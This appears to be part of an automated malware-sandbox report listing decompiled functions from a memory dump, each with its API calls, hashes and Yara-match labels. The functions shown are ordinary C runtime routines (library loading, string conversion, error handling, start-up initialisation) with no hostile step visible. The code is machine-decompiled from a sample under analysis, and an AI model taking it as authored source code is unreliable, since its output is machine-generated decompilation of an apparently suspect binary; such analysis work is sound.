                • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
                • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                Download Yara Rule
                C-Code - Quality: 27%
                			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t12;
				int _t18;
				signed int _t20;

				_t10 =  *0x412014; // 0x24fab668
				_v8 = _t10 ^ _t20;
				_v12 = _v12 & 0x00000000;
				_t12 =  &_v12;
				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
				if(_t12 != 0) {
					_t12 = GetProcAddress(_v12, "CorExitProcess");
					_t18 = _t12;
					if(_t18 != 0) {
						E0040C15C();
						_t12 =  *_t18(_a4);
					}
				}
				if(_v12 != 0) {
					_t12 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t12;
			}









                0x00403639
                0x00403640
                0x00403643
                0x00403647
                0x00403652
                0x0040365a
                0x00403665
                0x0040366b
                0x0040366f
                0x00403676
                0x0040367c
                0x0040367c
                0x0040367e
                0x00403683
                0x00403688
                0x00403688
                0x00403693
                0x0040369b

                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                Strings
                Memory Dump Source
                • Source File: 00000017.00000001.311259077.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000017.00000001.311282865.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                Download Yara Rule
                C-Code - Quality: 79%
                			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0x24fab668
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}























                0x004062c0
                0x004062c7
                0x004062ca
                0x004062d3
                0x004062d8
                0x004062dd
                0x004062e2
                0x004062e5
                0x004062e7
                0x004062e7
                0x004062ec
                0x00406305
                0x0040630b
                0x00406310
                0x004063af
                0x004063b3
                0x004063b8
                0x004063b8
                0x004063cc
                0x004063d4
                0x004063d4
                0x00406316
                0x00406319
                0x0040631e
                0x00406322
                0x0040636e
                0x00406370
                0x00406372
                0x00406377
                0x0040638e
                0x00406396
                0x004063a6
                0x004063a6
                0x00406396
                0x004063a8
                0x004063a9
                0x00000000
                0x004063ae
                0x00406324
                0x00406329
                0x0040632b
                0x0040632d
                0x0040632d
                0x00406335
                0x00406352
                0x0040635c
                0x00406361
                0x00000000
                0x00000000
                0x00406363
                0x00406369
                0x00406369
                0x00000000
                0x00406369
                0x00406339
                0x0040633d
                0x00406342
                0x00406346
                0x00000000
                0x00000000
                0x00406348
                0x00000000

                APIs
                • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                • __alloca_probe_16.LIBCMT ref: 0040633D
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                • __freea.LIBCMT ref: 004063A9
                  • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                Memory Dump Source
                • Source File: 00000017.00000001.311259077.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000017.00000001.311282865.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                • String ID:
                • API String ID: 313313983-0
                • Opcode ID: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                • Opcode Fuzzy Hash: 3668a24b8cc91a8edc8bb6444902db7ad8a914eb3222a5b1c35fe0f4f695b84c
                • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405751, Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMON
                Download Yara Rule
                C-Code - Quality: 95%
                			E00405751(signed int _a4) {
				signed int _t9;
				void* _t13;
				signed int _t15;
				WCHAR* _t22;
				signed int _t24;
				signed int* _t25;
				void* _t27;

				_t9 = _a4;
				_t25 = 0x412fc8 + _t9 * 4;
				_t24 =  *_t25;
				if(_t24 == 0) {
					_t22 =  *(0x40cd48 + _t9 * 4);
					_t27 = LoadLibraryExW(_t22, 0, 0x800);
					if(_t27 != 0) {
						L8:
						 *_t25 = _t27;
						if( *_t25 != 0) {
							FreeLibrary(_t27);
						}
						_t13 = _t27;
						L11:
						return _t13;
					}
					_t15 = GetLastError();
					if(_t15 != 0x57) {
						_t27 = 0;
					} else {
						_t15 = LoadLibraryExW(_t22, _t27, _t27);
						_t27 = _t15;
					}
					if(_t27 != 0) {
						goto L8;
					} else {
						 *_t25 = _t15 | 0xffffffff;
						_t13 = 0;
						goto L11;
					}
				}
				_t4 = _t24 + 1; // 0x24fab669
				asm("sbb eax, eax");
				return  ~_t4 & _t24;
			}










                0x00405756
                0x0040575a
                0x00405761
                0x00405765
                0x00405773
                0x00405789
                0x0040578d
                0x004057b6
                0x004057b8
                0x004057bc
                0x004057bf
                0x004057bf
                0x004057c5
                0x004057c7
                0x00000000
                0x004057c8
                0x0040578f
                0x00405798
                0x004057a7
                0x0040579a
                0x0040579d
                0x004057a3
                0x004057a3
                0x004057ab
                0x00000000
                0x004057ad
                0x004057b0
                0x004057b2
                0x00000000
                0x004057b2
                0x004057ab
                0x00405767
                0x0040576c
                0x00000000

                APIs
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue), ref: 00405783
                • GetLastError.KERNEL32(?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000,00000364,?,004043F2), ref: 0040578F
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004056F8,00000000,00000000,00000000,00000000,?,004058F5,00000006,FlsSetValue,0040D200,0040D208,00000000), ref: 0040579D
                Memory Dump Source
                • Source File: 00000017.00000001.311259077.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000017.00000001.311282865.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID:
                • API String ID: 3177248105-0
                • Opcode ID: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                • Instruction ID: a071a87d579bf16c10ed97f701b3afe57148fc5a73c01e838bdae708b7fec84a
                • Opcode Fuzzy Hash: 179fc24cb71fa7b74b78db1aa8efd8080a6824dbe4e2c3e4e777693639d287a7
                • Instruction Fuzzy Hash: 2001AC36612622DBD7214BA89D84E577BA8EF45B61F100635FA05F72C0D734D811DEE8
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00404320, Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                Download Yara Rule
                C-Code - Quality: 71%
                			E00404320(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0xffffffff
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0xffffffff
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                0x00404320
                0x00404320
                0x00404320
                0x0040432a
                0x0040432c
                0x00404331
                0x00404334
                0x00404342
                0x00404349
                0x0040434e
                0x00404351
                0x00404354
                0x00404366
                0x0040436b
                0x0040436d
                0x00404378
                0x0040437f
                0x00404384
                0x00404387
                0x00404389
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040436f
                0x0040436f
                0x00000000
                0x0040436f
                0x00404356
                0x00404356
                0x00404357
                0x00404357
                0x0040435c
                0x00404397
                0x00404398
                0x0040439e
                0x004043a3
                0x004043a6
                0x004043a7
                0x004043a8
                0x004043af
                0x004043b1
                0x004043b3
                0x004043b8
                0x004043bb
                0x004043c9
                0x004043d5
                0x004043d8
                0x004043db
                0x004043ed
                0x004043f2
                0x004043f4
                0x004043ff
                0x00404405
                0x0040440d
                0x0040440f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004043f6
                0x004043f6
                0x00000000
                0x004043f6
                0x004043dd
                0x004043dd
                0x004043de
                0x004043de
                0x00404411
                0x00404412
                0x00404412
                0x004043bd
                0x004043c3
                0x004043c7
                0x0040441a
                0x0040441b
                0x00404421
                0x00000000
                0x00000000
                0x00000000
                0x004043c7
                0x00404428
                0x00404428
                0x00404336
                0x0040433c
                0x00404340
                0x0040438b
                0x0040438c
                0x00404396
                0x00000000
                0x00000000
                0x00000000
                0x00404340

                APIs
                • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
                • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
                • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
                • _abort.LIBCMT ref: 0040439E
                Memory Dump Source
                • Source File: 00000017.00000001.311259077.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000017.00000001.311282865.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: ErrorLast$_abort
                • String ID:
                • API String ID: 88804580-0
                • Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
                • Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
                • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
                Uniqueness

                Uniqueness Score: -1.00%

                Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                0x004025ba
                0x004025bf
                0x004025cb
                0x004025d0
                0x004025d5
                0x004025d7
                0x004025e2
                0x004025d9
                0x004025d9
                0x00000000
                0x004025d9
                0x004025cd
                0x004025cd
                0x004025cf
                0x004025cf

                APIs
                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
                  • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
                Memory Dump Source
                • Source File: 00000017.00000001.311259077.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000017.00000001.311282865.0000000000414000.00000040.00020000.sdmp Download File
                Yara matches
                Similarity
                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                • String ID:
                • API String ID: 1761009282-0
                • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
                • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
                • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00405575, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00405575() {

				 *0x412e78 = GetCommandLineA();
				 *0x412e7c = GetCommandLineW();
				return 1;
			}



                0x0040557b
                0x00405586
                0x0040558d

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000017.00000002.327015327.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                Yara matches
                Similarity
                • API ID: CommandLine
                • String ID: @4H
                • API String ID: 3253501508-1291218567
                • Opcode ID: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                • Instruction ID: 265b5206e6e9c5440433cfe38bbdb56a7b23962a2c49d0f47ff6119da82ef27c
                • Opcode Fuzzy Hash: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
                • Instruction Fuzzy Hash: 24B09278800300CFD7008FB0BB8C0843BA0B2382023A09175D511D2320D6F40060DF4C
                Uniqueness

                Uniqueness Score: -1.00%